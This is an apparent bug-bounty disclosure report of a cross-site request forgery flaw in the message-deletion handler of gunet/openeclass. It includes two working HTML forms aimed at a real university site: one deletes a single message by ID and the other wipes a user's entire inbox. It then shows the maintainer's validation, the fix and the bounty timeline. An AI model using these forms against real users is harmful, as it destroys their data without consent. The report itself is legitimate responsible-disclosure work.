Cross-Site Request Forgery (CSRF) in gunet/openeclass

Valid

Reported on

Jan 2nd 2022


Description

No CSRF is provided when deleting messages.

Proof of Concept

The attacker could delete a specific message as they are generated consecutively and brute forcing it.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.eclass.tuc.gr/modules/message/ajax_handler.php" method="POST">
      <input type="hidden" name="mid" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

or the could just delete all the messages:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.eclass.tuc.gr/modules/message/ajax_handler.php" method="POST">
      <input type="hidden" name="all&#95;inbox" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

Combining this with an XSS vulnerability the attacker could force the user to delete their messages.

We are processing your report and will contact the gunet/openeclass team within 24 hours. 7 months ago
We have contacted a member of the gunet/openeclass team and are waiting to hear back 7 months ago
We have sent a follow up to the gunet/openeclass team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the gunet/openeclass team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the gunet/openeclass team. This report is now considered stale. 6 months ago
Alexandros Diamantidis validated this vulnerability 2 months ago

Thank you for the report, and sorry for taking so long to review it! We add appropriate CSRF protection in our next release (3.13), due for release in the next couple of days.

Dimitris Angelou has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the gunet/openeclass team. We will try again in 7 days. a month ago
We have sent a second fix follow up to the gunet/openeclass team. We will try again in 10 days. a month ago
We have sent a third and final fix follow up to the gunet/openeclass team. This report is now considered stale. a month ago
Alexandros Diamantidis confirmed that a fix has been merged on 14c72c 17 hours ago
The fix bounty has been dropped
to join this conversation